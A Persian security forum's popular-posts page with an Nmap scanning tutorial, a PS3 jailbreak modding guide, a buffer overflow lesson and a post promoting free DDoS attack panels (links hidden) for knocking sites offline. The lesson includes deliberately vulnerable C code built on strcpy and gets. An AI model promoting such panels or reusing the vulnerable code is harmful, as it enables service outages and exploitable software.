تخته امتیازات
مطالب محبوب
در حال نمایش مطالب دارای بیشترین امتیاز از زمان 02/15/2025 در همه بخش ها
-
آموزش عملی و کامل ابزار Nmap (از 0 تا 100)
ParsaAh13 و یک فرد دیگر برای D3F417 امتیاز داد
آموزش عملی و کامل ابزار Nmap (از 0 تا 100) ( کامل ترین تاپیک آموزشی Nmap) ابزار Nmap (Network Mapper) یکی از پرکاربردترین ابزارها در دنیای امنیت سایبری و تست نفوذ است که برای شناسایی و اسکن شبکهها، سرورها و دستگاهها در یک شبکه استفاده میشود. Nmap به طور خاص برای بررسی وضعیت پورتها، شناسایی سیستمعاملها و شناسایی آسیبپذیریها کاربرد دارد. در این مقاله، آموزش عملی و جامع استفاده از ابزار Nmap را از 0 تا 100 پوشش خواهیم داد. این آموزش شامل مراحل مختلف استفاده از Nmap برای اسکن شبکهها و تحلیل اطلاعات است. 1. آشنایی با مفاهیم اولیه Nmap Nmap برای شناسایی اطلاعاتی مانند پورتهای باز، سیستمعامل، خدمات در حال اجرا و اطلاعات دیگر مربوط به دستگاهها و شبکهها طراحی شده است. پورت اسکنینگ (Port Scanning): یکی از اصلیترین کاربردهای Nmap است که برای شناسایی پورتهای باز و فعال در یک سیستم یا شبکه استفاده میشود. OS Detection (شناسایی سیستمعامل): Nmap قادر است سیستمعاملهای مختلف دستگاههای موجود در شبکه را شناسایی کند. Service Version Detection (شناسایی نسخه سرویسها): Nmap میتواند نسخه دقیق سرویسهای در حال اجرا بر روی پورتهای مختلف را شناسایی کند. Scripting Engine (NSE): Nmap دارای یک موتور اسکریپتنویسی به نام Nmap Scripting Engine است که برای انجام تحلیلهای پیشرفته و شناسایی آسیبپذیریها کاربرد دارد. 2. نصب Nmap Nmap میتواند بر روی اکثر سیستمعاملها مانند لینوکس، ویندوز و macOS نصب شود. در اینجا نحوه نصب آن بر روی لینوکس و ویندوز توضیح داده شده است: 1. نصب Nmap در ویندوز (Windows) روش اول: نصب با استفاده از فایل اجرایی به وبسایت رسمی Nmap بروید: Nmap Download Page. نسخه ویندوز را انتخاب کرده و فایل اجرایی (EXE) را دانلود کنید. فایل دانلود شده را اجرا کرده و مراحل نصب را دنبال کنید. پس از نصب، برای استفاده از Nmap میتوانید از Command Prompt (CMD) یا PowerShell استفاده کنید. برای بررسی اینکه نصب به درستی انجام شده است، دستور زیر را در CMD وارد کنید: nmap --version روش دوم: نصب از طریق Chocolatey (اگر Chocolatey را قبلاً نصب کردهاید) choco install nmap 2. نصب Nmap در لینوکس (Linux) در لینوکس، نصب Nmap به راحتی از طریق مدیر بسته (Package Manager) قابل انجام است. اوبونتو / دبیان / لینوکس مبتنی بر دبیان (Debian-based Linux Distributions) ترمینال را باز کنید و دستور زیر را وارد کنید: sudo apt update sudo apt install nmap فدورا / ردهت / سنتاواس (Fedora / RedHat / CentOS) ترمینال را باز کنید و دستور زیر را وارد کنید: sudo dnf install nmap آرچ لینوکس (Arch Linux) ترمینال را باز کنید و دستور زیر را وارد کنید: sudo pacman -S nmap برای بررسی نصب، دستور زیر را در ترمینال وارد کنید: nmap --version 3. نصب Nmap در مک (Mac) برای نصب Nmap در macOS، شما میتوانید از Homebrew استفاده کنید. اگر Homebrew را ندارید، ابتدا باید آن را نصب کنید. 3.1. نصب Homebrew (در صورت عدم وجود) ترمینال را باز کرده و دستور زیر را وارد کنید: /bin/bash -c "$(curl -fsSL [Hidden Content])" 3.2. نصب Nmap با Homebrew پس از نصب Homebrew، دستور زیر را در ترمینال وارد کنید: brew install nmap بررسی نصب پس از نصب، میتوانید از دستور زیر برای بررسی نسخه Nmap استفاده کنید: nmap --version نکات مهم اطمینان حاصل کنید که به عنوان administrator یا root در سیستم خود وارد شدهاید تا Nmap دسترسی لازم برای انجام اسکنهای شبکه را داشته باشد. اگر از سیستمهای مبتنی بر لینوکس استفاده میکنید، ممکن است به بعضی از دستورها نیاز به نصب پیشنیازها داشته باشید (مانند sudo apt install libpcap-dev در برخی توزیعها). منتظر پارت بعدی باشید 🙂 امیدوارم خوشتون اومده باشه میتونید از طریق پیام دادن به من هر پیشنهاد / انتقاد / مشکل هست در رابطه با این تاپیک درمیون بزارید با کمال میل خوشحال میشم حمایت هم کنید 🫡2 امتیاز -
آموزش عملی و کامل ابزار Nmap (از 0 تا 100)
D3F417 و یک فرد دیگر برای ParsaAh13 امتیاز داد
منتظر پارت بعدی هستم👏❤️2 امتیاز -
آموزش عملی و کامل ابزار Nmap (از 0 تا 100)
ParsaAh13 و یک فرد دیگر برای D3F417 امتیاز داد
آشنایی با دستورات ابتدایی Nmap آشنایی با دستورات ابتدایی Nmap Nmap (Network Mapper) یکی از ابزارهای مهم و محبوب برای نقشهبرداری از شبکهها و شناسایی نقاط ضعف امنیتی در سیستمهای شبکهای است. این ابزار متنباز و قدرتمند به مدیران سیستم و متخصصان امنیت شبکه این امکان را میدهد که با استفاده از دستورات ساده و پیشرفته شبکههای مختلف را اسکن کرده و اطلاعات دقیقی را در مورد دستگاهها، خدمات در حال اجرا، پورتها و حتی سیستمعاملها بهدست آورند. در ادامه، به بررسی برخی از دستورات ابتدایی و رایج Nmap میپردازیم که میتوانند در اسکنهای ابتدایی شبکه بسیار مفید واقع شوند. 1. دستور پایهای nmap [IP] این دستور سادهترین و ابتداییترین روش برای اسکن یک دستگاه یا هاست است. با وارد کردن آدرس IP یا نام دامنه در کنار دستور nmap، اطلاعاتی مانند پورتهای باز و خدمات در حال اجرا روی آن دستگاه نمایش داده میشود. nmap 192.168.1.1 این دستور اطلاعاتی در مورد پورتهای باز و سرویسهای فعال در دستگاه هدف ارائه میدهد. 2. سوئیچ -sS: اسکن TCP SYN (Stealth Scan) این نوع اسکن یکی از سریعترین روشها برای شناسایی پورتهای باز است. Nmap با ارسال بستههای SYN به پورتها، بهطور غیرمستقیم وضعیت پورتها را بررسی میکند و به هیچوجه اتصال کامل به هدف برقرار نمیکند. این کار باعث میشود که اسکن شبیه به اتصال عادی بهنظر برسد و شناسایی آن برای سیستم هدف سختتر باشد. nmap -sS 192.168.1.1 در این اسکن، پورتهایی که در پاسخ به بسته SYN یک بسته RST ارسال میکنند، بسته میشوند و پورتهایی که پاسخ SYN/ACK میدهند، باز در نظر گرفته میشوند. 3. سوئیچ -sT: اسکن TCP Connect در این نوع اسکن، Nmap از اتصال کامل TCP برای شناسایی پورتهای باز استفاده میکند. این اسکن کندتر از اسکن SYN است اما اگر شما به سیستم دسترسی داشته باشید، میتوانید از آن استفاده کنید. nmap -sT 192.168.1.1 این دستور به Nmap اجازه میدهد که اتصال TCP کامل را برای هر پورت برقرار کرده و در صورت موفقیت، پورت را باز اعلام کند. 4. سوئیچ -sP (Ping Scan): اسکن دستگاههای فعال در شبکه این سوئیچ برای شناسایی دستگاههای فعال در یک شبکه محلی (Local Network) استفاده میشود. Nmap با ارسال پینگ به دستگاهها، تشخیص میدهد کدام یک از دستگاهها بهطور فعال در شبکه حضور دارند. nmap -sP 192.168.1.0/24 این دستور تمام دستگاههای فعال در شبکهی 192.168.1.0/24 را شناسایی میکند. 5. سوئیچ -sV: شناسایی نسخه خدمات این سوئیچ برای شناسایی نسخههای دقیق خدمات اجرا شده بر روی پورتهای باز استفاده میشود. Nmap پس از شناسایی پورتهای باز، اقدام به شناسایی نسخههای خدمات (مانند Apache، OpenSSH و غیره) میکند. nmap -sV 192.168.1.1 این دستور نسخه دقیق سرویسهای در حال اجرا در پورتهای باز را گزارش میدهد. 6. سوئیچ -O: شناسایی سیستمعامل با استفاده از این سوئیچ میتوانید سیستمعامل دستگاه هدف را شناسایی کنید. Nmap از ویژگیهای خاص هر سیستمعامل برای تشخیص آن استفاده میکند. nmap -O 192.168.1.1 این دستور سیستمعامل دستگاه هدف را شناسایی و گزارش میدهد. 7. سوئیچ -p: انتخاب پورتها برای اسکن این سوئیچ برای مشخص کردن پورتهای خاص برای اسکن استفاده میشود. با این سوئیچ میتوانید فقط پورتهای خاصی را برای اسکن انتخاب کنید. nmap -p 22,80,443 192.168.1.1 این دستور فقط پورتهای 22 (SSH)، 80 (HTTP) و 443 (HTTPS) را اسکن میکند. 8. سوئیچ -T<0-5>: تنظیم سرعت اسکن Nmap به شما این امکان را میدهد که سرعت اسکن را تنظیم کنید. با استفاده از این سوئیچ میتوانید میزان صبر Nmap را تنظیم کرده و اسکن سریعتری داشته باشید. -T0 برای اسکن بسیار آهسته -T1 برای اسکن آهسته -T2 برای اسکن متوسط -T3 برای اسکن سریع -T4 برای اسکن بسیار سریع -T5 برای اسکن سریعترین حالت nmap -T4 192.168.1.1 این دستور اسکن سریعتری نسبت به حالت پیشفرض انجام میدهد. 9. سوئیچ -A: اسکن کامل با شناسایی سیستمعامل و نسخهها این سوئیچ به شما امکان میدهد که تمام ویژگیهای Nmap مانند اسکن سیستمعامل، شناسایی نسخه خدمات، اسکن اسکریپتهای Nmap و غیره را در یک اسکن ترکیب کنید. nmap -A 192.168.1.1 این دستور تمام اطلاعات ممکن از دستگاه هدف را جمعآوری میکند. 10. سوئیچ -v: نمایش جزئیات بیشتر اسکن این سوئیچ برای مشاهده جزئیات بیشتر از مراحل اسکن استفاده میشود. با استفاده از -v میتوانید جزئیات بیشتری از آنچه که Nmap در حال انجام است، مشاهده کنید. nmap -v 192.168.1.1 این دستور علاوه بر اسکن دستگاه، جزئیات بیشتری از فرآیند اسکن را به شما نمایش میدهد. 11. سوئیچ --script: اجرای اسکریپتهای Nmap Nmap به شما این امکان را میدهد که اسکریپتهای خاصی را برای انجام اسکنهای پیشرفتهتر اجرا کنید. این اسکریپتها برای شناسایی آسیبپذیریها، بررسی خدمات خاص و کارهای دیگر مفید هستند. nmap --script=default 192.168.1.1 این دستور اسکریپتهای پیشفرض Nmap را اجرا میکند. 12. سوئیچ -iL: اسکن از روی لیست آدرسهای IP این سوئیچ به شما این امکان را میدهد که چندین آدرس IP را از یک فایل ورودی برای اسکن کردن به Nmap بدهید. nmap -iL target_ips.txt این دستور فایل target_ips.txt را میخواند و اسکن را برای تمام IPهای موجود در آن اجرا میکند. 13. سوئیچ -n: جلوگیری از حل نام DNS با استفاده از این سوئیچ میتوانید از حل نام دامنه DNS جلوگیری کنید و فقط از آدرسهای IP برای اسکن استفاده کنید. nmap -n 192.168.1.1 این دستور از حل نام دامنه DNS خودداری میکند. 14. سوئیچ -F: اسکن سریعتر با پورتهای معمولی اگر میخواهید یک اسکن سریعتری داشته باشید و فقط پورتهای پرکاربرد را اسکن کنید، میتوانید از سوئیچ -F استفاده کنید. nmap -F 192.168.1.1 این دستور بهطور پیشفرض فقط پورتهای پرکاربرد را اسکن میکند. نتیجهگیری Nmap ابزاری قدرتمند و جامع برای شناسایی و تحلیل شبکهها است. با استفاده از دستورات و سوئیچهای مختلف این ابزار، شما میتوانید انواع مختلفی از اسکنها را انجام داده و اطلاعات دقیقی در مورد شبکه و دستگاهها بهدست آورید. از اسکنهای ساده گرفته تا اسکنهای پیشرفته و شناسایی سیستمعاملها، Nmap به شما کمک میکند که امنیت شبکههای خود را بررسی کنید و نقاط ضعف آنها را شناسایی کنید. منتظر پارت بعدی باشید 🙂 امیدوارم خوشتون اومده باشه میتونید از طریق پیام دادن به من هر پیشنهاد / انتقاد / مشکل هست در رابطه با این تاپیک درمیون بزارید با کمال میل خوشحال میشم حمایت هم کنید 🫡2 امتیاز -
سلام خدمت کاربرای عزیز چند سالی غیر فعال بودم اما بالاخره مشکلات کمی کمتر شد و بالاخره میتونم در کنار شما باشم . یکی از آموزشاتی که در هیچ سایت و انجمنی ندیدم قرار بگیره روش های کرک ، هک ، فعالسازی و ... در کنسول های بازی هستش که بر فرض مثال نصب مود های gta v روی ps3 در هیچ سایت ایرانی وجود نداره . امیدوارم بزودی بخشی در انجمن برای موضوعات وابسته به کنسول ها نیز قرار بگیره که تاپیک رو انتقال بدم . خب دوستان قبل از انجام کار باید بگم که این آموزش صرفا برای کنسول های جیلبریک و کپی خور شده هستش و در آینده برای کنسول های orginal نیز تاپیکی قرار میدم . *نکته : نصب مود در کنسول ps3 تفاوت بسیار زیادی با PC و دیگر کنسول ها داره پس مرحله به مرحله پیش برید اطلاعات کنسول های مورد استفاده من : ( این روش بر روی تمامی کنسول های PS3 کپی خور عمل میکند ) PS3 Slim 120GB و PS3 Super Slim 240 GB CFW : 4.82 کبری و CFW : 4.81 فرکس ------------------------ در انتها و در پست های بعدی نسخه های مختلف مود لودر ( update ) و نسخه های مختلف مود بازی GTA V رو قرار میدم *نکته : این کار هیچ تغییری در اصل بازی نصبی شما ایجاد نمیکند و بازی شما از همان مرحله فعلی شما لود خواهد شد *نکته : مسئولیت اشتباه در حین انجام کار و اشکال در روند اجرای بازی با شما می باشد پس مراقب باشید و از بازی خودتون بکاپ تهیه کنید *نکته : سعی کنید به جای جایگزینی از تغییر نام و قرار دادن فایل ها در پوشه های مورد نظر استفاده کنید *نکته : برای برگشت دادن بازی به حالت عادی کافیست فایل های بوت و اپدیت رو به نسخه اصلی برگردونید و همچنین فایل sprx رو از قسمت tmp پاک کنید ***نکته : این آموزش برای اولین بار توسط بنده در این انجمن قرار داده میشه و بزودی نسخه فیلم برداری شده از کنسول های خودم رو نیز در همین تاپیک قرار میدم ----------------------- مرحله اول : چک کنید که برنامه Multiman روی کنسول شما نصب شده باشه . ( در صورت نصب نبودن به انتهای پست مراجعه کنید و سپس ادامه مراحل را انجام دهید ) مرحله دوم : فایل های آپلودی زیر را دانلود کنید مرحله سوم : فلش usb خود را به Fat32 فرمت کنید و سپس فایل های اکسترکت شده را در فلش قرار دهید مرحله چهارم : فلش را به کنسول متصل کرده و وارد محیط اصلی کنسول شوید مرحله پنجم : وارد مولتی من در دستگاه خود شده و به سربرگ اول مولتی من و File Manager mmOS برید مرحله ششم : پنجره های باز شده را ببندید و روی دکمه ps3 Root در بالای صفحه خود دوبار X را بفشارید مرحله هفتم : وارد بخش dev_usb000 شوید مرحله هشتم : موس خود را روی فایل EBOOT.BIN اورده و کلید O رو بزنید و در منو باز شده روی Copy دکمه X را بفشارید تا فایل کپی شود مرحله نهم : مجددا روی ps3 Root کلیک کرده و اینبار وارد بخش dev_hdd0 شوید مرحله دهم : وارد پوشه game شوید ( حروف کوچک و درونش پوشه های مختلف بازی های نصب شده روی کنسول را مشاهده میکنید ) مرحله یازدهم : همونطور که مشاهده میکنید پوشه های با نام های Bles0180 , Bles0170 و در اینجا قرار دارند ، خب بازی GTA V عموما با نام Bles1807 نمایش داده میشود که یک پوشه هم نام با پسوند instal در زیر آن مشاهده می شود ، وارد این پوشه شوید ( در صورت مشاهده نکردن این پوشه ، همه پوشه هارا باز کنید و روی icon کلیک کنید تا لوگو بازی رو ببینید و gta رو پیدا کنید ) مرحله دوازدهم : روی پوشه USRDIR که در داخل پوشه bles قرار گرفته کلیک کنید و سپس با زدن دکمه O روی دسته و paste فایل بوت را جایگزین ( replace ) فایل موجود کنید ( البته جهت محکم کاری و اینکه مراقب فایل اصلی بازی باشیم میتونید به جای جایگزین کردن نام فایل بوت اصلی رو تغییر بدید Rename و سپس paste کنید تا هر زمان که خواستید بازی رو به حالت اولیه برگردانید ) مرحله سیزدهم : همین کار انتقال و کپی رو با فایل update که در فلش خودتون دارید انجام بدید و دو فایل رو جایگزین کنید ( فایل آپدیت مود لودر هستش و مدل های مختلفی داره که در زیر قرار میدم ) مرحله چهاردهم : 80% کار کامل شده ، خب شما یک فایل دیگه در فلش خودتون دارید با پسوند sprx ، این فایل رو کپی کنید و اینبار وارد بخش tmp در dev_hdd0 کنسول خود بشید ( در صورت مشاهده نکردن این پوشه با دکمه های بالا و پایین آنالوگ (D-pad) پایین آمده تا پوشه را مشاهده کنید ) مرحله پانزدهم : با زدن کلید O فایل رو همین پوشه paste کنید مرحله شانزدهم : با فشردن کلید R1 روی دسته خود وارد بخش Games در مولتی من شوید و بازی gta v اینبار مود شده خود را فعال کنید تمام ------------------------ مولتی من : فایل دانلود شده را در usb خود قرار داده ، از قسمت game وارد بخش instal packege file بشید و فایل با پسوند pkg رو روی دستگاه خودتون نصب کنید دانلود MultiMan 4.82 از سرور CFA ( در صورتی که کاستوم فریمور دستگاه شما پایین تر می باشد ورژن پایین تر این برنامه را از سایت های دیگر دانلود کنید ) ----------------------- نام و آپشن های مود GTA V پیوست شده در زیر : mod loader : tony efzi نحوه فعال سازی R3+L3 mod menu : freedom V1.5 پسورد فایل ها : guardiran.org ---------------------------------------------- لینک دانلود : GTA V PS3 MOD Menu1 امتیاز
-
پنل های اتک و دیداس
aminweb برای SeniorSpirit امتیاز داد
سلام و خسته نباشید خدمت تمامی اعضای گاردایران و مدیران یه چند وقتی نبودم گفتم امروز بیام یه چیزی رو پست کنم که جایی ندیدم که باشه:) راجب انواع برنامه های دیداس و غیره قبلا دوستان تو تاپیک های مختلف توضیح دادن ولی تاحالا کسی پنل های اتک رو نزاشته بود، یا حداقل من ندیدم [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] این یه لیست از پنل های فری هستش که باهاش میتونید خیلی سایتا و سرور ها رو آف کنید و حتی بعضی از بهترین فایروال ها هم بعضی وقتا آف میشن(با پنل ipstreeser) در رابطه با کپی رایت هم منبع این آموزش هم سایت خودم بود که اسمی نمیارم، و تنها کسی هم که این پنل ها رو گذاشته خودم بودم پس فکر نکنم نیازی به کپی رایت باشه1 امتیاز -
آموزش مقدماتی آسیب پذیری Buffer OverFlow + پروژه عملی
C0d3!Nj3ct!0n برای D3F417 امتیاز داد
سرریز بافر (Buffer Overflow) چیست؟ سرریز بافر یک مشکل امنیتی و خطای برنامه نویسی است که وقتی اتفاق می افتد که یک برنامه سعی میکند دادههای بیشتری از حد ظرفیت مشخص شده در یک فضای ذخیره سازی موقت (به نام بافر) بنویسد. این اتفاق شبیه این است که یک لیوان را آنقدر پر کنید که آب از لبههای آن سرریز شود! توضیح ساده با مثال: فرض کنید یک برنامه کامپیوتری دارید که یک فیلد برای وارد کردن نام کاربری دارد. این فیلد طوری طراحی شده که فقط ۱۰ کاراکتر جای میدهد (مثل یک لیوان کوچک). حالا اگر کسی به جای ۱۰ کاراکتر، ۱۵ کاراکتر وارد کند، ۵ کاراکتر اضافی جایی میروند که نباید بروند! این داده های اضافی ممکن است به بخشهای دیگر حافظه کامپیوتر که برای کارهای مهم دیگر (مثل ذخیره پسورد یا دستورات برنامه) استفاده میشوند، نفوذ کنند. چرا خطرناک است؟ ۱. تغییر رفتار برنامه: اگر هکر بتواند داده های سرریز شده را کنترل کند، ممکن است بتواند برنامه را مجبور به اجرای کدهای مخرب کند (مثلاً باز کردن در پشتی برای دسترسی به سیستم). ۲. ازکاراندازی سرویس: سرریز بافر میتواند باعث کرش کردن برنامه یا سیستم شود. ۳. دسترسی غیرمجاز: در بدترین حالت، هکرها از این آسیب پذیری برای نفوذ به سرورها، سرقت اطلاعات، یا انتشار بدافزار استفاده میکنند. چطور اتفاق میافتد؟ برنامهنویسان گاهی فراموش میکنند محدودیت اندازه دادهها را بررسی کنند. زبانهای برنامهنویسی مثل C یا C++ که کنترل کاملی روی حافظه دارند، بیشتر در معرض این خطا هستند. مثال معروف: بسیاری از ویروسها و کرمهای کامپیوتری قدیمی (مثل کرم موریس در سال ۱۹۸۸) از همین آسیب پذیری استفاده می کردند. چگونه جلوگیری کنیم؟ ۱. بررسی اندازه داده ها: قبل از نوشتن داده در بافر، مطمئن شوید اندازه آن از حد مجاز بیشتر نباشد. ۲. استفاده از زبانهای امنتر: زبانهایی مانند Python یا Java به صورت خودکار از سرریز بافر جلوگیری میکنند. ۳. ابزارهای محافظتی: Stack Canaries: قطعه داده هایی که تغییر غیرمنتظره آنها هشدار می دهد. ASLR: تصادفی سازی آدرس حافظه برای سخت تر کردن نفوذ. DEP: جلوگیری از اجرای کد در بخشهای غیر مجاز حافظه. جمعبندی سرریز بافر مثل پرکردن بیش از حد یک لیوان است! اگر برنامه نویسان مراقب نباشند، این خطای ساده میتواند به مجرمان سایبری اجازه دهد کنترل سیستم را بدست بگیرند. با رعایت اصول کدنویسی ایمن و استفاده از تکنیکهای محافظتی، میتوان از آن جلوگیری کرد. اهمیت درک سرریز بافر (Buffer Overflow) به عنوان یک آسیبپذیری امنیتی درک سرریز بافر به عنوان یک آسیبپذیری امنیتی نه تنها برای توسعهدهندگان، بلکه برای تمام فعالان حوزه امنیت سایبری ضروری است. این آسیبپذیری یکی از قدیمیترین و خطرناکترین مشکلات امنیتی است که هنوز هم در سیستمهای مدرن مشاهده میشود. در زیر دلایل اصلی اهمیت این موضوع بررسی میشود: ۱. تاریخچه طولانی و تاثیر گسترده سرریز بافر از دهه ۱۹۸۰ تا امروز به عنوان یک نقطه ضعف کلیدی در حملات سایبری استفاده شده است. مثال تاریخی: کرم موریس در سال ۱۹۸۸ که با سوءاستفاده از این آسیبپذیری، ۱۰% از سیستمهای متصل به اینترنت را آلوده کرد. حتی در سالهای اخیر، آسیبپذیریهایی مثل Heartbleed (۲۰۱۴) یا EternalBlue (۲۰۱۷) از مکانیزمهای مشابه استفاده کردهاند. نتیجه: آشنایی با این آسیبپذیری کمک میکند الگوهای حملات قدیمی و جدید را تشخیص دهید. ۲. پتانسیل تخریب بالا سرریز بافر به هکرها اجازه میدهد: کدهای مخرب را اجرا کنند (مثلاً باز کردن دسترسی از راه دور). برنامه یا سیستم را کرش کنند (مانند حملات DOS). دادههای حساس (مانند پسوردها یا اطلاعات بانکی) را سرقت کنند. مثال: یک سرریز بافر در یک سرور وب میتواند به هکر اجازه دهد کل سیستم را کنترل کند. ۳. شیوع در زبانها و سیستمهای پراستفاده زبانهای C و C++ به دلیل دسترسی مستقیم به حافظه، بیشتر در معرض این آسیبپذیری هستند. سیستمهایی که با این زبانها نوشته شدهاند (مثل سیستمعاملها، مرورگرها، برنامههای Embedded) هنوز هم ممکن است حاوی چنین خطاهایی باشند. حتی برنامههای مدرن (مثل بازیها یا نرمافزارهای سازمانی) میتوانند به دلیل کدنویسی ضعیف آسیبپذیر باشند. نتیجه: تا زمانی که سیستمهای Legacy یا کدهای قدیمی استفاده میشوند، سرریز بافر یک تهدید زنده است. ۴. پایهای برای یادگیری امنیت سایبری درک سرریز بافر به شما کمک میکند مفاهیم زیر را عمیقاً بفهمید: نحوه کارکرد حافظه کامپیوتر (Stack، Heap، و غیره). تفاوت بین زبانهای مدیریت حافظه (مانند Rust) و زبانهای Unmanaged (مانند C). مکانیزمهای محافظتی مثل ASLR، DEP، و Stack Canaries. این مفاهیم برای تحلیل سایر آسیبپذیریها (مثل SQL Injection یا ROP Attacks) نیز ضروری هستند. ۵. ضرورت پیشگیری و رفع آسیبپذیری توسعهدهندگان با یادگیری سرریز بافر میتوانند: از توابع ناامن (مثل strcpy در C) اجتناب کنند. از توابع ایمن (مثل strcpy با بررسی طول) استفاده کنند. ابزارهای تحلیل کد (مثل Valgrind یا AddressSanitizer) را به کار گیرند. سازمانها نیز با آموزش تیمهای خود، ریسک حملات را کاهش میدهند. ۶. جلوگیری از حملات زنجیرهای بسیاری از حملات پیشرفته (مثل APTها یا حملات روز صفر) ترکیبی از چندین آسیبپذیری هستند. سرریز بافر اغلب به عنوان اولین قدم برای دسترسی به سیستم استفاده میشود. مثلاً هکر ابتدا با سرریز بافر کنترل بخشی از حافظه را میگیرد، سپس از تکنیکهایی مانند ROP برای اجرای کد مخرب استفاده میکند. ۷. اهمیت در آزمونهای نفوذ تسترهای نفوذ و هکرهای اخلاقی (Ethical Hackers) باید بتوانند سرریز بافر را شناسایی و شبیهسازی کنند. ابزارهایی مثل Metasploit یا Immunity Debugger برای اکسپلویت کردن این آسیبپذیری طراحی شدهاند. آزمونهای موسسههایی مانند OSCP نیز بر شناسایی چنین آسیبپذیریهایی تمرکز دارند. ۸. تاثیر بر قوانین امنیتی استانداردهایی مانند CWE (Common Weakness Enumeration) سرریز بافر را در رده CWE-120 به عنوان یک نقطه ضعف بحرانی فهرست میکنند. سازمانها برای رعایت مقرراتی مثل GDPR یا ISO 27001 موظفند چنین آسیبپذیریهایی را برطرف کنند. جمعبندی نهایی سرریز بافر تنها یک «خطای برنامه نویسی» ساده نیست، بلکه یک گره امنیتی حیاتی است که در صورت نادیده گرفتن، میتواند به فاجعه منجر شود. درک این مفهوم: به توسعهدهندگان کمک میکند کدهای امنتری بنویسند. به مدافعان امنیت سایبری اجازه میدهد حملات را پیشبینی و خنثی کنند. به سازمانها در جلوگیری از زیانهای مالی و اعتباری کمک میکند. جلوگیری از تاثیرات منفی برای کاهش خسارتهای سرریز بافر: ۱. استفاده از زبانهای ایمن (مثل Rust یا Python) که مدیریت حافظه خودکار دارند. ۲. فعالسازی مکانیزمهای دفاعی: ASLR (تصادفیسازی آدرس حافظه). DEP (جلوگیری از اجرای کد در حافظه داده). Stack Canaries (شناسایی تغییرات غیرمجاز در Stack). ۳. بررسی منظم کد با ابزارهای تحلیل استاتیک (Static Analysis). ۴. آزمون نفوذپذیری (Penetration Testing) برای شناسایی آسیبپذیریها. نتیجهگیری سرریز بافر تنها یک خطای فنی نیست، بلکه یک تهدید امنیتی چندوجهی است که میتواند امنیت دادهها، حریم خصوصی، و حتی جان انسانها را به خطر بیاندازد. درک عمیق این آسیبپذیری و پیادهسازی راهکارهای پیشگیرانه، برای تمام سازمانها و توسعهدهندگان ضروری است. 😊 حافظه و پشته (Stack) ساختار حافظه: در سیستمهای کامپیوتری، حافظه به بخشهای مختلفی تقسیم میشود که هر کدام کارکرد خاصی دارند: کد (Text Segment): شامل کد برنامه اجرایی است. این بخش فقط خواندنی است و حافظتهایی در برابر نوشتن روی آن وجود دارد. داده (Data Segment): برای ذخیره متغیرهای سراسری (global) و دادههای مقداردهی شده استفاده میشود. پشته (Stack): برای ذخیره اطالاعات محلی توابع، آرگومانها و آدرس بازگشت استفاده میشود. در پشته، آخرین دادهای که افزوده شده، اولین دادهای است که حذف میشود (LIFO). هیپ (Heap): برای تخصیص حافظهی پویا در طول اجرای برنامه استفاده میشود. مدیریت حافظه در این بخش باید به صورت صریح توسط برنامهنویس انجام شود. پشته و نحوه عملکرد آن (LIFO): پشته براساس اصل Last In, First Out عمل میکند. در اکثر زبانهای برنامهنویسی، مانند C و C++، وقتی یک تابع فراخوانی میشود، فضای لازم برای متغیرهای محلی و آدرس بازگشت در پشته تخصیص داده میشود. نقش پشته در فراخوانی توابع: پشته نقش مهمی در فراخوانی توابع ایفا میکند. هنگام فراخوانی یک تابع: آرگومانها و آدرس بازگشت تابع در پشته ذخیره میشود. پس از بازگشت از تابع، آدرس بازگشت خوانده شده و برنامه به آنجا ادامه پیدا میکند. متغیرها و بافرها تعریف متغیرها و بافرها: متغیر: در برنامهنویسی، متغیرها مکانهایی در حافظه هستند که برای ذخیره دادهها تعریف میشوند. بافر: نوعی آرایه یا بلوک حافظه است که برای ذخیره دادهها در هنگام انتقال میان دو فرآیند یا بین بخشهای مختلف یک برنامه استفاده میشود. نحوه ذخیره دادهها در بافرها و اهمیت اندازه بافر: بافرها به صورت متوالی در حافظه ذخیره میشوند و در صورت استفاده ناصحیح، ممکن است منجر به مشکلاتی مانند “Buffer Overflow” شوند. اگر ورودی بافرها به درستی کنترل نشود، میتواند باعث مشکلات امنیتی جدی شود. نحوه فراخوانی توابع و بازگشت آدرس نحوه فراخوانی توابع در C/C++: هنگام فراخوانی تابع، آدرس دستور بعدی در پشته ذخیره میشود تا برنامه پس از اجرای تابع به این دستور برگردد. این مکان با استفاده از آدرس بازگشت مدیریت میشود. نقش پشته در ذخیره آدرس بازگشت: هر بار که تابعی فراخوانی میشود، آدرس بازگشت در پشته ذخیره میشود. اگر این آدرس دچار تغییر شود (مانند حالتی که در حملات امنیتی رخ میدهد)، میتواند جریان اجرای برنامه را به یک مسیر غیرمنتظره ببرد. #include <stdio.h> #include <string.h> void vulnerableFunction(char *input) { char buffer[10]; strcpy(buffer, input); // بدون بررسی اندازه ورودی، ورودی را درون بافر کپی میکند printf("Input received: %s\n", buffer); } int main() { char userInput[100]; printf("Enter something: "); gets(userInput); // دریافت ورودی از کاربر vulnerableFunction(userInput); return 0; } نکات مهم: در تابع vulnerableFunction، تابع strcpy مستقیماً از ورودی کاربر استفاده کرده و آن را به buffer کپی میکند. اگر ورودی بزرگتر از اندازه بافر باشد، باعث “Buffer Overflow” میشود. استفاده از gets خطرناک است زیرا هیچ کنترلی بر روی اندازه ورودی ندارد. معرفی محافظتهای رایج Stack Canaries: مقادیر خاصی که بین بافر و آدرس بازگشت قرار میگیرند. اگر این مقدار تغییر کند، سیستم از وقوع “Buffer Overflow” آگاه میشود. Address Space Layout Randomization (ASLR): مکانهای خاصی از حافظه را در هر اجرا تغییر میدهد تا بهرهبرداری از آسیبپذیریها دشوارتر شود. Data Execution Prevention (DEP/NX): جلوگیری از اجرای کد در بخشهایی از حافظه که فقط برای دادهها تعیین شدهاند. نحوه دور زدن محافظتها (به صورت مختصر) شامل تکنیکهای پیچیدهای مانند Return-Oriented Programming (ROP) است. این روش به بهرهبرداران اجازه میدهد که با استفاده از توابع موجود در باینری و بدون اجرای مستقیم کد مخرب، سیستم را به نیات خود هدایت کنند. استفاده از توابع امن مانند strncpy به جای strcpy. همواره اندازه ورودیها را بررسی کرده و از توابعی که به صورت پیشفرض امن نیستند، با احتیاط استفاده کنید. از روشهای استاندارد برای مدیریت حافظه و محافظت از برنامهها در برابر آسیبپذیریها بهره ببرید، مانند استفاده از پشتههای محافظت شده و ارزیابی دقیق کد #include <stdio.h> #include <string.h> void vulnerableFunction(const char *input) { char buffer[5]; strcpy(buffer, input); printf("Received: %s\n", buffer); } int main() { char userInput[20]; printf("Enter input: "); gets(userInput); vulnerableFunction(userInput); return 0; } تابع gets ورودی بیش از حد مجاز 